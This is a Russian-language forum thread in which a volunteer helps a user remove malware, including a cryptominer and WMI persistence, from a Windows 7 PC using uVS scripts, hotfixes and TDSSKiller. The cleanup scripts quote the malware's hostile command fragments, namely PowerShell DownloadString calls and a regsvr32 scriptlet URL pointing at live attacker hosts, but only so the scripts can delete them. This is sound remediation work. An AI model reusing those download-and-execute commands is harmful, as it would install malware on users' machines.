Выполнила. Только 1 утилита работает до сих пор. ЕЕ закрыть? Протокол прилагаю. Файл получился большой, поэтому выкладываю ссылку. https://cloud.mail.ru/public/KNgX/BTYBoTLrr

ЕЕ закрыть? »
Предположу, что уже закончила. Если нет, закройте.

Далее:
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО (https://safezone.cc/threads/18577/).
Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:

;uVS v4.1.2 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
BREG
;---------command-block---------
delwmi HTTP://173.208.139.170/2.TXT
delwmi HTTP://35.182.171.137/3.TXT
delref HTTP://JS.1226BYE.XYZ:280/V.SCT
delwmi HTTP://WMI.1217BYE.HOST/1.TXT
delref HTTP://GO.MAIL.RU/DISTIB/EP/?Q={SEARCHTERMS}&PRODUCT_ID=%7B36211421-F73F-4DB9-AC43-EAF0EE80A431%7D&GP=820851
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\PPOILMFKBPCKODOIFDLKMKEPCAJFJMHL\7.0.25_0\ДОМАШНЯЯ СТРАНИЦА MAIL.RU
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\PPOILMFKBPCKODOIFDLKMKEPCAJFJMHL\5.0.1_0\ДОМАШНЯЯ СТРАНИЦА MAIL.RU
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\MFMJPFOGGIKOLKFILOFBPGCNHDCGAHIB\3.0.2_1\ДОМАШНЯЯ СТРАНИЦА MAIL.RU
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\EIODDFAEPDOEIFBHJPHFEFGIPCJCDIEO\7.0.25_0\ПОИСК MAIL.RU
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\PFJGIBHMCGNCMJHDODPAOLFBJPJJAJAL\3.0.2_0\ПОИСК MAIL.RU
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\EIODDFAEPDOEIFBHJPHFEFGIPCJCDIEO\7.0.25_0\ПОИСК MAIL.RU
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\NEHAPOFAKGHLJOPFEGJOGPGPELJKHJJN\8.24.1_0\ПОИСК И СТАРТОВАЯ — ЯНДЕКС
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\AOJOECKCMJGHLCHNNENFKBFLNDBEPJPK\8.24.1_0\ПОИСК И СТАРТОВАЯ — ЯНДЕКС
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\LADDJIJKCFPAKBBNNEDBHNNCIECIDNCP\8.23.0_0\ПОИСК ЯНДЕКСA
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\PJFKGJLNOCFAKOHEOAPICNKNOGLIPAPD\2.0.1.15_0\СТАРТОВАЯ — ЯНДЕКС
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\PJFKGJLNOCFAKOHEOAPICNKNOGLIPAPD\1.2.0.1_0\СТАРТОВАЯ — ЯНДЕКС
bl BF69865A3ACD3379B0A8D870CCD43618 113
zoo %SystemRoot%\WEB\N.VBS
delall %SystemRoot%\WEB\N.VBS
zoo %SystemRoot%\TEMP\78AF6A03-09CC-4A56-93D3-A2F488A462A0
delall %SystemRoot%\TEMP\78AF6A03-09CC-4A56-93D3-A2F488A462A0
delref A.EXE
zoo %SystemRoot%\TEMP\BDBAE61F-CE5E-402C-B1EB-72C84A863192
delall %SystemRoot%\TEMP\BDBAE61F-CE5E-402C-B1EB-72C84A863192
zoo %SystemRoot%\DEBUG\ITEM.DAT
delall %SystemRoot%\DEBUG\ITEM.DAT
delref PS&C:\WINDOWS\HELP\LSMOSEE.EXE
zoo %SystemRoot%\DEBUG\OK.DAT
delall %SystemRoot%\DEBUG\OK.DAT
delref S.DAT
delref S.RAR
delref S&C:\WINDOWS\UPDATE.EXE
delwmi &POWERSHELL.EXE
delwmi SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTP://173.208.139.170/S.TXT')&POWERSHELL.EXE
delwmi SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTP://35.182.171.137/S.JPG')||REGSVR32
delwmi SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTP://WMI.1217BYE.HOST/S.PS1')&POWERSHELL.EXE
apply

zoo %SystemRoot%\TEMP\CONHOST.EXE
bl 147BA798E448EB3CAA7E477E7FB3A959 221184
addsgn 925277BA106AC1CC0B24544E33231995AF8CBA7E8EBD1EA3F0C44EA2D3388D5DF8652EEF3F559D492A5BF198CD08CA1481CE 336395DB6B5F26028CA4D985CC8F 8 Trojan.Win64.Miner.kau [Kaspersky] 7

zoo %SystemRoot%\INF\MSIEF.EXE
bl 9091762417FBD6E7DFC3E024ECE18DF4 304983
addsgn 1A22739A5583C28CF42B95BCAC695105D7FFFE044A08F63C83C3C53F31D271C7E294A25F3E92DC4DE38FC79F81173DE33EDF 2B27DE36E6D3587F2FDE2FA8178C 8 Trojan.BAT.Starter.ly [Kaspersky] 7

chklst
delvir

deltmp
czoo
restart

В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.
После выполнения скрипта зайдите в папку, где распакована утилита uVS найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2013-06-30_22-04-27.7z)
Если архив отсутствует, то заархивруйте папку ZOO (https://safezone.cc/threads/19310) с паролем virus.
Полученный архив отправьте с помощью этой формы (https://dragokas.com/virusnet/) или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.
Подробнее читайте в этом руководстве (https://safezone.cc/threads/14509/#post-79352).


Соберите и прикрепите еще раз контрольный лог uVS.

Скрипт выполнила. Компьютер перезагрузился. Архив с ZOO_... отправила с помощью формы. Контрольный лог от uVS утилиты прилагаю. По ссылке https://cloud.mail.ru/public/FdRq/TmSNBiNjK

Обновления системы ставите? Давайте проверим:

Загрузите SecurityCheck by glax24 & Severnyj (http://tools.safezone.cc/glax24/SecurityCheck/SecurityCheck.exe) и сохраните утилиту на Рабочем столе
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
Прикрепите этот файл к своему следующему сообщению.

В Настройках на обновление стоит "Никогда", вывод, что система не обновляется. Лог прилагаю.

Установите эти хотфиксы, иначе лечение бесполезно:

------------------------------- [ HotFix ] --------------------------------
HotFix KB3115858 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB3115858)
HotFix KB3140735 Внимание! Скачать обновления (https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-026)
HotFix KB3138910 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB3138910)
HotFix KB3138962 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB3138962)
HotFix KB3145739 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB3145739)
HotFix KB3146963 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB3146963)
HotFix KB3156013 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB3156013)
HotFix KB3156016 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB3156016)
HotFix KB3155178 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB3155178)
HotFix KB3153171 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB3153171)
HotFix KB3170455 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB3170455)
HotFix KB3178034 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB3178034)
HotFix KB3185911 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB3185911)
HotFix KB3184122 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB3184122)
HotFix KB3192391 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB3192391)
HotFix KB3197867 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB3197867)
HotFix KB3205394 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB3205394)
HotFix KB4012212 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212)
HotFix KB4019263 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4019263)
HotFix KB4022722 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4022722)
HotFix KB4015546 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4015546)
HotFix KB4025337 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4025337)
HotFix KB4034679 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4034679)
HotFix KB4041678 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4041678)
HotFix KB4056894 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4056894)
HotFix KB4056897 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4056897)
HotFix KB4074587 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4074587)
HotFix KB4103712 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4103712)
HotFix KB4343899 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4343899)
HotFix KB4457145 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4457145)
HotFix KB4462923 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4462923)
HotFix KB4486563 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4486563)

Спасибо выполняю.

Пока еще устанавливаю обновления. Это закончится часа через 2. Что делать после того, как установлю все обновления?

Установила все обновления. Запустила утилиту AutoLogger-test. Протоколы прилагаю. Какие мои дальнейшие действия?

Результат проверки DrWeb CurelT привожу

Скриншоты можно в виде картинки прикреплять.

Сделайте свежий лог uVS.

Cвежий лог uVS.

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО (https://safezone.cc/threads/18577/).
Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:

;uVS v4.1.2 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
BREG

;---------command-block---------
delref HTTP://JS.1226BYE.XYZ:280/V.SCT
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\PPOILMFKBPCKODOIFDLKMKEPCAJFJMHL\7.0.25_0\ДОМАШНЯЯ СТРАНИЦА MAIL.RU
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\PPOILMFKBPCKODOIFDLKMKEPCAJFJMHL\5.0.1_0\ДОМАШНЯЯ СТРАНИЦА MAIL.RU
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\MFMJPFOGGIKOLKFILOFBPGCNHDCGAHIB\3.0.2_1\ДОМАШНЯЯ СТРАНИЦА MAIL.RU
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\EIODDFAEPDOEIFBHJPHFEFGIPCJCDIEO\7.0.25_0\ПОИСК MAIL.RU
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\PFJGIBHMCGNCMJHDODPAOLFBJPJJAJAL\3.0.2_0\ПОИСК MAIL.RU
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\NEHAPOFAKGHLJOPFEGJOGPGPELJKHJJN\8.24.1_0\ПОИСК И СТАРТОВАЯ — ЯНДЕКС
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\LADDJIJKCFPAKBBNNEDBHNNCIECIDNCP\8.23.0_0\ПОИСК ЯНДЕКСA
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 1\EXTENSIONS\PJFKGJLNOCFAKOHEOAPICNKNOGLIPAPD\2.0.1.15_0\СТАРТОВАЯ — ЯНДЕКС
delref %SystemDrive%\USERS\ADMIN\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSIONS\PJFKGJLNOCFAKOHEOAPICNKNOGLIPAPD\1.2.0.1_0\СТАРТОВАЯ — ЯНДЕКС
bl BF69865A3ACD3379B0A8D870CCD43618 113
zoo %SystemRoot%\WEB\N.VBS
delall %SystemRoot%\WEB\N.VBS
delref A.EXE
delref PS&AMP;C:\WINDOWS\HELP\LSMOSEE.EXE
delref S.DAT
delref S.RAR
delref S&AMP;C:\WINDOWS\UPDATE.EXE
zoo %SystemRoot%\DEBUG\ITEM.DAT
delall %SystemRoot%\DEBUG\ITEM.DAT
apply

zoo %SystemRoot%\INF\MSIEF.EXE
bl 9091762417FBD6E7DFC3E024ECE18DF4 304983
addsgn 1A22739A5583C28CF42B95BCAC695105D7FFFE044A08F63C83C3C53F31D271C7E294A25F3E92DC4DE38FC79F81173DE33EDF 2B27DE36E6D3587F2FDE2FA8178C 8 Trojan.BAT.Starter.ly [Kaspersky] 7

chklst
delvir

czoo
deltmp
restart

В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.
После выполнения скрипта зайдите в папку, где распакована утилита uVS найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2013-06-30_22-04-27.7z)
Если архив отсутствует, то заархивруйте папку ZOO (https://safezone.cc/threads/19310) с паролем virus.
Полученный архив отправьте с помощью этой формы (https://dragokas.com/virusnet/) или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.
Подробнее читайте в этом руководстве (https://safezone.cc/threads/14509/#post-79352).


Ещё раз лог uVS, пожалуйста сделайте.

Выполнила скрипт, отправила файлы в форме, прилагаю свежий лог

Не сдается. Ну ничего, мы тоже не сдаемся ))

Скачайте архив TDSSKiller.zip (http://media.kaspersky.com/utilities/VirusUtilities/RU/tdsskiller.zip) и распакуйте его в отдельную папку;
Запустите файл TDSSKiller.exe.
Нажмите кнопку "Начать проверку". Не меняйте настройки сканирования по умолчанию.
В процессе проверки могут быть обнаружены объекты двух типов:
вредоносные (точно было установлено, какой вредоносной программой поражен объект);
подозрительные (тип вредоносного воздействия точно установить невозможно).
По окончании проверки утилита выводит список обнаруженных объектов с их подробным описанием.
Для вредоносных объектов утилита автоматически определяет действие: Лечить или Удалить.
Для подозрительных объектов утилита предоставляет выбор действия пользователю (по умолчанию Пропустить).
Самостоятельно без указания консультанта ничего не удаляйте!!!
После нажатия кнопки Продолжить утилита выполняет выбранные действия и выводит результат.
Прикрепите лог утилиты к своему следующему сообщению По умолчанию утилита выводит отчет работы в корень системного диска (диска, на котором установлена операционная система, как правило, это диск С:\).
Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txt
Например, C:\TDSSKiller.3.0.0.44_10.05.2015_13.39.01_log.txt

Утилиту выполнила, ком-р предложил перезагрузку, сделала, утилита снова стартанула теперь сама, снова проверила, и так несколько раз, т.к. один файл не излечивается. приложила все логи.

один файл не излечивается »
Нет, просто система заражается по новой.

Проверьте еще раз уязвимости, на этот раз так:
Выполните скрипт в AVZ (http://forum.oszone.net/post-1430637-4.html) при наличии доступа в интернет:

var
LogPath : string;
ScriptPath : string;
begin
LogPath := GetAVZDirectory + 'log\avz_log.txt';
if FileExists(LogPath) Then DeleteFile(LogPath);
ScriptPath := GetAVZDirectory +'ScanVuln.txt';
if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else
begin
if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath)
else begin
ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
exit;
end;
end;
if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.

После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить.
В первую очередь это относится к браузерам, Java, Adobe Acrobat/Reader и Adobe Flash Player.

Пройдитесь по ссылкам из файла avz_log.txt и установите все рекомендуемые обновления (если таковые будут).
Перезагрузите компьютер.
Снова выполните этот скрипт и убедитесь, что уязвимости устранены.

После устранения возможных уязвимостей ещё раз соберите лог TDSS.

Большое спасибо за помощь. Отпишусь теперь уже после отпуска. ДО отпуска сделать не успею. Убегаю, но я вернусь, т.к. вопрос не закрыт.
СПАСИБО!!!!